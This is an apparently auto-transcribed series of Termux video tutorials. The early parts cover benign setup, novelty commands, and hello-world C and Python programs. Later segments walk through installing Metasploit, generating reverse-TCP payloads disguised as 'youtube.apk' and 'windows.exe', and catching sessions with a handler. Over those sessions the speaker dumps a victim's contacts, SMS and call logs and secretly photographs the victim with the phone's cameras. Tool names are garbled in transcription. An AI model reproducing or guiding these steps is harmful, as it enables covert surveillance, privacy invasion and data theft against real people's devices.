And now I am going to click on my Play Store. Here I am writing Termex. Now here you can see the Termex application, and you can see some of the screenshots related to the Termex terminal. And next, clicking on install, it gets downloading. And next click on open. And now we are in the terminal of Termex application. Here you can see some of the information like Wikipedia. And if you want to install any packages or search any packages, you need to just type pkg search query. Query is related to any package name. And next, installing of packages, you have to type pkg install and a package name. And if you want to upgrade the packages, just type pkg upgrade. And if you want any help from the Termex application, you just type pkg help. So in further videos, we are going to see how to hack the devices, how to do web scanning, and many more things. So that's all in this video. Thank you. Hi, in this video we are going to see what is Termex application and what are its features. Termex is an Android application emulator and Linux environment app that works directly with the no rooting or any set requirements. A minimal based system is installed automatically. You can add additional packages by using apt package manager. And it is also secured for remote services using the SSH client for OpenSSH. So before going to the further explanation, I am going to tell you what is OpenSSH. OpenSSH is a suite of security related networking level utilizes based on the security shell protocols. Means there are some of the protocols which are carried out through the Termex application. And also OpenSSH helps you to secure network communication via the encryption of a network traffic or a multiple authentication methods and by proved by security tunnels capabilities. So this is all about OpenSSH. And next, coming to the feature packets that are nano, gripping through the SMS box, base, and also exploitable packages which are available on the Termex are similar to the Linux operating system and also Mac, and installing man pages on your phone and reading them in one session while experimenting with them in another. And also it consists of some of the add-ons like Terminal API, which exists the Android and Chrome hardware features. And the second one is Termex boot. Run a script with your device booting. Means it allows you to boot your Android device. And next one is Termex float. Run a Termex in a floating windows. And next, Termex styling. Termex styling allows you to color schema and powerline ready fonts, customizing the appearance of the Termex terminal. Means you can change your alphabets present in the Termex in the form of stylish way. And next is Termex task, an easy way to call Termex executable form, taskers, and compatibility apps. And at last, Termex wizard. Termex wizard starts a small script table from the home screen. So these are the add-ons and features of Android Termex application. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to see how to install Hacker Keyboard on your Android device. So now, I am going to click on my Play Store and next type Hacker Keyboard. Here you can see the Hacker Keyboard application and some of the screenshots related to it. And next, clicking on install. Okay, now the Hacker's Keyboard has been installed. I am going to click on open. Here you can see the information about the Hacker's Keyboard and 4 buttons. Now I am going to click on enable keyboard. It shows that available virtual keyboard. I am going to select Hacker's Keyboard, then pressing OK. The pop-up shows that you are going to enable the Hacker's Keyboard for all the applications. And next, here you can see the input language. You can select any languages to your keyboard. You can select any languages to your hacker keyboard. And next, clicking on setting up input method. Now, here you can see the another pop-up, that is change keyboard. You can select Gboard or English and English language or hackers keyboard. And next, clicking on get dictionaries, you can see so many dictionaries, French, Germany and many more. So now, coming back to my screen, here you can see the hackers keyboard has been installed. And next, I'm going to open up my Termex, and now I'm going to change my keyboard into hackers keyboard. Now, here you can see the hackers keyboard, which consists of Control, Escape, Alt, Enter button, functions keys, and it is similar to the keyboard which is present on your desktop. And next, I'm going to click on function. Here you can see all the functions keys from F1 to F12, and also home, and page up, page down, insert, delete, and the 4 arrow keys. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, you're going to learn some of the top 10 commands that can be used in the Termex. Now, I'm going to open up my Termex. I have already updated my packets by typing apt update, and now I'm going to type apt install sl. Sl is a command used for fun. It is a simple small program, and now it gets installed. I'm going to wait for a while. Now it's installed, and next I'm going to type sl. Here comes a small train. So we came to know that the SL program consists of a small train which can move from one end to the another. So here is my next command, factor. If you want to check any factors of a number, you can just type factor and a number. Now here I am going to type factor 100, and I am showing the factors of 100. Those are 2, 2, 5, 5, and next typing factors of 200. Those are 2, 2, 2, 5, 5. So this is how you are going to get the factors of the numbers. So my next command is fish. I am going to install the fish by typing apt install fish. It gets installed, and now typing fish. It says that welcome to fish, the friendly interactive shell. Here you can get the shell command terminal. You can access any folder, any file through the fishing. And my next command is figlet. I am going to install by typing apt install figlet. Figlet is a command. It's going to display the larger character made up of your ordinary screen characters. Okay, here it gets installed, and now I am going to type figlet. After typing figlet, you have to type any name. I am going to type here Danny Jack. Here you can see the Danny Jack in the larger character. It's pretty cool to see the names in the larger character. So now I am going to my next command, that is cmatrix. Cmatrix is a command which is used to display the horizontal characters for 2-3 seconds on your Android phone. Now I am going to install cmatrix by typing apt install cmatrix. After getting installed, I am going to type here cmatrix. Now here you can see the matrix format on my Android phone. It's going to display for 2-3 seconds. Okay, now it's gone. And my next command is twiled. I'm going to type here apt install twiled. Twiled is a simple program which will display the character in the stylish format and also colorful format. Okay, now it gets installed. Now I'm typing twiled. After typing the name, I'm going to type here Danny. Okay, now here you can see the Danny in the stylish format, and if you want to add a color further, I'm going to type twiled FMONO 12 capital letter F, Gay, Danny. Okay, now here you can see the Danny in the colorful characters. So that's how we are going to create a character in the colorful format using the tile. And my next command is W3M. W3M is a command which is going to create a search engine on your terminal. So now I'm typing apt install W3M. By this command, I'm going to show you Google search engine. Okay, now it gets installed, and now I'm going to type w3m google.com. Here you can see the Google search engine. You can search anything here by just typing on your keyboard, but in the terminal it doesn't show any graphical formats. So that's how W3M command works. Coming to my next command, that is ifconfig. So I'm going to just type ifconfig. All of us know the ifconfig displays the IP address of your LAN or WAN. Here you can see my IP address and also iNet address. It works similarly like what we get in the Windows and other OSs. So there are a few more commands which I have given in the description. You can try it yourself and have fun. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, we are going to learn how to send a SMS using termx. Before sending the SMS, you need to add two things. First one is I'm going to open up my Play Store and type termx API. Termx API is an application which will give interaction between the other applications. And next, second one is apt install termx API. This I'm going to do it later. Coming back to my termx application, now typing apt update. So why I'm doing this update again and again is if there is any package has been updated, it gets installed on my termx. And next typing apt install termx API. Similarly, this also gets updated. And next, sending SMS to your phone or your friend's phone. And now I'm going to type a simple command, that is termx SMS send. Here you need to add your number and next what the message you are going to send. Here I'm typing my number and hello world. Then pressing enter. Okay, now the SMS has been sent. I'm going to wait for a while. I'm going to get a notification of an SMS. So here we got the notification of my SMS. The SMS says that hello world. So this is how we are going to use termx application to send a SMS to your phone number or your friend's phone number. That's all in this video. Thank you. Hi, welcome back to my video. In this video, you're going to learn how to make a call using termx. So, as we saw in the previous video, how to install termx API application on your Android device and also how to send a SMS. Similarly, in this video, you're going to learn how to make a call using termx. Now, clicking on my termx application, typing apt update. Now, all the packages have been updated. And next, typing apt install termx API. Then pressing enter and next making call to your phone number or your friend's phone number. Now typing a simple command line, that is termx telephone call, and next I'm going to enter my number and pressing enter. Okay, now it's asking me which SIM you want to select to make a call. I'm going to select SIM 1. Here you can see the call is getting connected. So this is how I'm going to make a call using termx. So similarly, you can try in your phone by installing this application and typing these commands. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, we are going to see how to create a storage in Termux. There are three main storages: app private storage, shared internal storage, and external storage. These are the three main storages which are used in the Android phone. If you want to create a storage in Termux, you need to type Termux setup storage. It will give the permission to share the folders by creating a storage itself. So basically when you use Termux, it doesn't show any storages or any folder present in your internal storage, but it will only show the home and user directories. And if you have downloaded any link from any site or GitHub link, it will be stored in the home directory. And now I'm going to open my Termux and typing ls command. Here you can see some of the folders and files which are stored in the home directory, and now typing cd ... then press enter. It will get back from the rooted folders. So now I'm going to type Termux setup storage and press enter. By typing this command, you will get the storage folder. After that, you can see the shared folder. By that, you can access any other files present in your internal storage. So now, getting back to my command, then I'm going to type ls command. Again, you can see here the home and user directory, and next entering into my home directory by typing cd home, and then again ls command, enter. Here you can see the storage folder which has been set up by the Termux setup storage command. Okay, now getting into the storage folder by typing cd storage and again typing ls command. So here you can see some of the folders that are downloads, DCIM, that is photo gallery, music, picture, shared. As I said, shared folder contains all the files and folders of the internal storage. And now I'm going to type cd shared. Now here you can see the folders present in my internal storage. Here I'm going to create a directory by typing mkdir jack. So I have created a directory. Let me check in my internal storage. Yeah, here I get it. You can see the name of the folder, jack. And now I'm going to check in my internal storage. So coming back to my Termux, that's how you can create a folder and store some of the files and get them into the Termux terminal. So that's all in this video. Thank you.
Hi, welcome back to my video. In this video, you are going to learn how to create a simple C program and how to execute it. Before going to write a C program, we need to install some of the packages. First, I am going to install clang. Clang is a front end for the programming languages like C, C++, OpenMP, and also for Python. And now I am going to type apt install clang. Okay, now clang gets installed, and next I'm going to install nano. So now typing apt install nano. Nano is a command line text editor that can be run for a command prompt via Telnet or SSH session. It's going to allow you to create a text file or to write any program. Okay, this gets installed. Okay, now it's time to write a simple C program on your Android Termux. So now I'm going to type nano new.c. New.c is a file name. So here comes an nano text editor, and now typing /include stdio.h int main opening and closing brackets inverted comma. In that I'm going to type hello world putting semicolon. Okay, now I'm going to press Ctrl O to save the file, pressing enter, and next Ctrl X to exit from the nano text editor. Coming back to my Termux, I'm going to compile this program by typing clang new.c. Okay, now program has been successfully compiled. Okay, next typing ./a.out. Here you can see the hello world. So this is how you create a simple C program on your Android Termux. So you can make use of Android Termux to write any program like C, C++, HTML or any text by installing these packets. So that's all in this video. Thank you.
Hi, welcome back to my video. In this video, you're going to learn how to create a Python program and how to execute it. To create a Python program, we need to install some of the packages related to the Python background. So, you have seen many hackers use Python programming to create hacking tools. So now, I'm going to install Python by typing apt install python and then pressing enter. Okay, now all the packages have been installed. Now directly creating a program file by typing nano new.py. Okay, now here we are in the text editor. Now typing print opening and closing brackets. In that I'm going to write hello, this is a Python program, ending up the semicolon. Next I equal to 100, j equal to 200, print I plus j. So now I'm going to press Ctrl O to save the files and then Ctrl X to exit from the file. Okay, now I'm going to compile the program by typing python new.py. Okay, now here you can see the output, that is hello, this is a Python program and the addition of two variables. So that's how we are going to create a Python program in our Termux. That's all in this video. Thank you. Hi, welcome back to my video. In this video, we are going to learn how to install Metasploit framework on Termux. So before going to that, I am going to explain what is Metasploit framework. Metasploit framework is a tool, or you can call it as a software platform for developing, testing, and executing exploits. It can be used for creating a security testing, and it is also known as penetration testing system. So now I'm going to open up my Termux and typing apt install curl. Curl is a tool that transfers data from or to a server using one of the protocols like HTTP, HTTPS, FTP, and many more. I have already installed on my Termux, and next typing pkg upgrade. So this also I have already installed on my Termux. So I suggest you guys, before doing any attacks, you should update your packages. So next, installing Metasploit framework on my Termux. I have given the URL link in the description. You can just copy it from there. And now I'm going to paste my URL, then press enter. Now it gets downloaded, and next typing ls command. Okay, now here you can see the metasploit.sh file, and now getting the access permission by typing chmod 777 metasploit.sh, and next running the Metasploit file by typing /metasploit.sh, then pressing enter. Now all the packages get installed. I'm going to wait for a while. Okay, now you can see all the packages have been installed, and now I'm going to type ls command. Here you can see the Metasploit framework and metasploit.sh file, and next I'm going to type cd Metasploit framework, and next typing ls command. Okay, now here you can see some of the files and folders related to the Metasploit framework. and also you can see the MSF console and MSF VMO, which are used to create a payload and exploit the other devices. And now it's time to launch the Metasploit framework by typing /MSF console. And now the Metasploit framework gets loaded. Okay, now here you can see the Metasploit framework. In the further video, I am going to show you how to hack the Android phone and PCs by using Android Termux. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, you're going to learn how to hack the Android phone by using Metasploit framework. Now entering into the folder by typing Metasploit framework and next ls. Here you can see the files and folders, and now I'm going to create a payload by typing /msfvmo p android /meterpreter /reverse TCP. Now entering the lhost, that is 192.168.1.102, and entering the port number L port 444, that is default, R APK /SD card /youtube.apk. So now I'm going to press enter. I'm going to wait for a while till it creates a payload. Okay, now it has created a payload with the name of youtube.apk. I'm going to show you youtube.apk in my file manager. Here I go into my file manager, and now you can see here the youtube.apk file. Okay, now I'm going to send it to my victim device. I have sent it, and now typing ls. So now I'm going to use MSF console to exploit the Android device of the victim. Okay, here MSF console gets loaded, and now typing use exploit /multi/handler, and next setting up the payload, set payload android /meterpreter /reverse TCP, and next setting up the lhost by typing set lhost 192.168.1.102 and L port 444. At last typing exploit. Now I'm going to install youtube.apk file in the victim device. Here you can see the installation. Okay, the app gets installed. And now coming back to my Termux. Okay, here I got the Meterpreter session. You can see it here. And now I'm typing system info. Okay, here I get the details of victim device, that is Android phone. So that's how we are going to hack the Android phone by using Metasploit framework in the Android Termux. That's all in this video. Thank you.
Hi, welcome back to my video. In this video, you are going to learn how to access directories and also how to see the content of victim Android phone. So in the previous video, you saw how to create a payload and also seen the information of victim phone. And now I am in my terminal. Here you can see the system information. And next I am going to type pwd. Pwd is a command, print working directory, where it shows the exact location of payload. So now here showing my payload where it is present, and next I am going to show you the directories present in the victim phone. Now entering into the SD card by typing cd/SD card, then pressing enter, next typing ls command. Here you can see all the directories present in the victim phone. You can see shared directory, themes, and some more directories. Next, if you want to create any directory in the victim phone, you should make use of mkdir command. And now I am going to create a directory by typing mkdir sac, then pressing enter. Then once again typing ls command. So here you can see the sac directory which I have created just now. And next I am going to show you how to remove the directory by typing rm sac and then again typing ls command. Here you can see that the directory has been deleted. So that's how we are going to create and delete a directory in the victim phone. Next I am going to show you how to copy the contacts of victim phone by just typing a simple command dump underscore contacts, then pressing enter. Now here it shows that the 228 contacts have been saved from the victim phone, and those contacts are saved in the .txt format with a file name. And also you can dump the SMSs and call logs by using same command. If you want to dump the SMSs, just type dump underscore SMS. And if you want to dump the call logs, just type dump underscore call log. And next I am going to check whether the victim phone is rooted or not by typing a simple command check root, then pressing enter. So this is how you are going to check the victim phone whether it is rooted or not. Now checking out the webcams of the victim phone by just typing webcam underscore list. Here it shows that there are two cameras. Those are 1 back camera, 2 front camera. And now I am going to take a snapshot from the victim phone by just typing webcam underscore snap 1. It's going to take a photo from the victim back camera. Here comes my pop-up gallery. Now you can see the photo which have been taken from the victim's camera. And next I am going to check for the front camera by just typing webcam underscore snap 2. So here you can see the victim face. So that's all in this video. This video is done on behalf of my student recommendation. So if you want any videos, send me a message. Thank you. Hi, welcome back to my video. In this video, we are going to learn how to hack the Windows PC by using Metasploit on your Android Termex. So, in the previous video, you saw how to hack the Android device by using Metasploit on your Android Termex. So now, by using Metasploit, I am going to hack my Windows PC. Now, entering into my folder by typing cd Metasploit framework and next ls. So here you can see some of the files and folders which are used to create a payload and also exploit the Windows PC. Now creating a payload by typing ./msfvmo p. P is used for plugins. Next Windows/meterpreter/reverse/tcp and entering my L host, that is 192.168.1. Next, setting up the L port, that is default 4444. Next, exe, giving the path to store my exe file /SD card /windows.exe, and then pressing enter. I am going to wait for a while. It's going to create a payload. Okay, now it has created a payload with the name of windows.exe and the file size is 73802 bytes. This is similar how you create a payload in your Kali Linux operating system. Coming back to my screen, going to my file manager, here you can see the windows.exe file, that is payload. Now I am going to send it to my Windows desktop. Here you can see the file on my Windows desktop. So next opening the new session in my Android Termex, typing cd Metasploit framework and next typing ls. Now I'm going to load the MSF console by typing ./MSF console. Here I'm going to use exploitation models to exploit Windows PC. Okay, now typing use exploit /multi/handler. Next, setting up the payload by typing set payload windows /meterpreter/rios_tcp, and next setting up the lhost, set lhost 192.168.1.1 and setting up the L port 4444. At last, typing exploit. Now I'm going to my Windows desktop, double clicking on exe file, that is payload. Coming back to my Android Termex, here I got the interpreter session, and now I'm going to type system info. Okay, now here you can see the system information which is showing that is Windows 7 and my PC name. So this is how you are going to hack the Windows PC by using Metasploit in your Android Termex. That's all in this video. Thank you.